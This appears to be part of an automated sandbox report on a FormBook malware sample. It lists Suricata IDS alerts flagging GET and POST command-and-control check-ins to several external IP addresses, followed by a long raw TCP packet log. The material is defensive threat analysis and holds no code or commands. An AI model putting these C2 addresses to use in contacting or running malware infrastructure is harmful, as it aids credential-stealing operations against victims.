                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishGreat Britain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-13T12:27:12.068665+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45040134.150.58.7380TCP
                      2024-09-13T12:27:12.068665+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45040134.150.58.7380TCP
                      2024-09-13T12:27:36.406189+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450402195.24.68.2580TCP
                      2024-09-13T12:27:38.981289+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450403195.24.68.2580TCP
                      2024-09-13T12:27:41.509593+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450404195.24.68.2580TCP
                      2024-09-13T12:27:44.114915+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450405195.24.68.2580TCP
                      2024-09-13T12:27:44.114915+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450405195.24.68.2580TCP
                      2024-09-13T12:27:50.249780+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450406162.0.213.9480TCP
                      2024-09-13T12:27:52.895730+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450407162.0.213.9480TCP
                      2024-09-13T12:27:55.566129+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450408162.0.213.9480TCP
                      2024-09-13T12:27:58.009578+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450409162.0.213.9480TCP
                      2024-09-13T12:27:58.009578+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450409162.0.213.9480TCP
                      2024-09-13T12:28:04.472198+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450410154.23.184.24080TCP
                      2024-09-13T12:28:07.016156+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450411154.23.184.24080TCP
                      2024-09-13T12:28:09.804943+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450412154.23.184.24080TCP
                      2024-09-13T12:28:12.118591+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450413154.23.184.24080TCP
                      2024-09-13T12:28:12.118591+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450413154.23.184.24080TCP
                      2024-09-13T12:28:18.860641+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45041447.104.180.13980TCP
                      2024-09-13T12:28:21.405375+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45041547.104.180.13980TCP
                      2024-09-13T12:28:23.960871+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45041647.104.180.13980TCP
                      2024-09-13T12:28:26.500137+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45041747.104.180.13980TCP
                      2024-09-13T12:28:26.500137+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45041747.104.180.13980TCP
                      2024-09-13T12:28:41.038596+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4504183.33.130.19080TCP
                      2024-09-13T12:28:42.647720+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4504193.33.130.19080TCP
                      2024-09-13T12:28:45.246673+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4504203.33.130.19080TCP
                      2024-09-13T12:28:47.750673+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4504213.33.130.19080TCP
                      2024-09-13T12:28:47.750673+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4504213.33.130.19080TCP
                      2024-09-13T12:29:01.458588+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450422199.59.243.22680TCP
                      2024-09-13T12:29:04.037143+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450423199.59.243.22680TCP
                      2024-09-13T12:29:06.625795+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450424199.59.243.22680TCP
                      2024-09-13T12:29:09.136695+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450425199.59.243.22680TCP
                      2024-09-13T12:29:09.136695+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450425199.59.243.22680TCP
                      2024-09-13T12:29:14.920189+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450426162.241.226.19080TCP
                      2024-09-13T12:29:17.468744+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450427162.241.226.19080TCP
                      2024-09-13T12:29:20.081191+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450428162.241.226.19080TCP
                      2024-09-13T12:29:22.926625+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450429162.241.226.19080TCP
                      2024-09-13T12:29:22.926625+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450429162.241.226.19080TCP
                      2024-09-13T12:29:29.806640+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45043091.215.85.2380TCP
                      2024-09-13T12:29:32.307060+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45043191.215.85.2380TCP
                      2024-09-13T12:29:34.992744+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45043291.215.85.2380TCP
                      2024-09-13T12:29:37.516534+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45043391.215.85.2380TCP
                      2024-09-13T12:29:37.516534+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45043391.215.85.2380TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 13, 2024 12:27:11.200375080 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:11.205661058 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:11.205790043 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:11.216728926 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:11.221894979 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068170071 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068217993 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068249941 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068283081 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068316936 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068346024 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.068665028 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.068665028 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.069057941 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.069089890 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.069123030 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.069155931 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.069284916 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.069284916 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.073551893 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.073584080 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.073617935 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.073738098 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.073841095 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.074103117 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.272926092 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.272965908 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273000002 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273035049 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273166895 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.273166895 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.273204088 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273241997 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273292065 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.273313046 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273345947 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273379087 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.273421049 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.274087906 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.274142027 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.274287939 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.274338007 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.274372101 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.274390936 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.274420977 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.274452925 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.274475098 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.275105000 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.275135994 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.275182009 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.275213957 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.275298119 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.275512934 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.275543928 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.275576115 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.275612116 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.278346062 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.278445959 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.278461933 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.278492928 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.278523922 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.278557062 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.278641939 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.278641939 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.477855921 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477894068 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477910995 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477926970 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477943897 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477960110 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477977037 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477994919 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478040934 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478122950 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478431940 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478457928 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.478457928 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.478503942 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478534937 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478568077 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478785038 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.478785038 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.479612112 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.479707003 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.479775906 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.485502958 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.490360975 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:35.698365927 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:35.703267097 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:35.703397989 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:35.725639105 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:35.730505943 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:36.406054020 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:36.406119108 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:36.406188965 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:37.238989115 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.258964062 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.264022112 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.264234066 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.277626038 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.282725096 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.981177092 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.981232882 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.981288910 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:39.788244009 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.803791046 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.809396029 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.809580088 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.826318979 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.831856966 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831897974 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831924915 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831952095 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831979036 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832034111 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832062006 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832087994 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832113981 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:41.509322882 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:41.509366035 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:41.509593010 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:42.332685947 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.355978012 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.361247063 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:43.361464977 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.373795033 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.378668070 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:44.114605904 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:44.114667892 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:44.114914894 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:44.118602037 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:44.123457909 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:49.655751944 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:49.660754919 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:49.660876036 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:49.681596041 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:49.686494112 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249691963 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249742031 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249779940 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.249793053 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249829054 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249861956 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249871969 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.249897003 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249941111 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.249969959 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250005007 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250045061 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.250052929 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250144005 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250195980 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.255011082 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255044937 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255079985 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255090952 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.255114079 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255151033 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.336692095 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.336713076 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.336757898 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.336766005 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.336802006 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:51.191987038 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.210294962 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.311269045 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.311444044 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.324922085 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.330029964 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895612955 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895661116 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895693064 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895730019 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895742893 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895792961 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895813942 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895831108 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895844936 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895876884 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895906925 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895916939 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895929098 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895946026 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.896502018 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.901026964 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901060104 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901093960 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901113987 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.901127100 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901427984 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.901463985 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.941875935 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.982047081 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.982084990 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.982121944 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.982151985 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.982186079 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:53.832672119 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.854692936 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.859962940 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.860233068 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.873523951 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.878592014 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878623009 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878674030 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878701925 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878729105 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878854036 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878896952 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878928900 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878956079 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.565969944 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566030025 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566066980 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566101074 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566128969 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566137075 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566170931 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566204071 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566217899 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566217899 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566237926 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566291094 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566309929 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566329002 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566384077 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.572108030 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.572141886 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.572176933 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.572232008 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.654321909 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.654367924 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.654407978 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.654464006 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:56.379465103 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.400866032 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.406083107 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:57.409181118 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.415049076 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.419930935 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009443045 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009497881 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009533882 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009566069 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009577990 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009613991 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009651899 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009656906 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009691000 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009694099 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009721041 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009752035 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009771109 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009804964 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009850979 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.014846087 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.014902115 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.014934063 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.014950037 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.015119076 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.015165091 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.098437071 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.098485947 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.098526001 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.098577023 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.098624945 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.101593018 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.106463909 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:28:03.548836946 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:03.553792000 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:03.554687977 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:03.566529989 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:03.571451902 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:04.472018957 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:04.472120047 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:04.472198009 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:05.066972017 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.085963964 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.091272116 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:06.091362953 CEST5041180192.168.2.4154.23.184.240
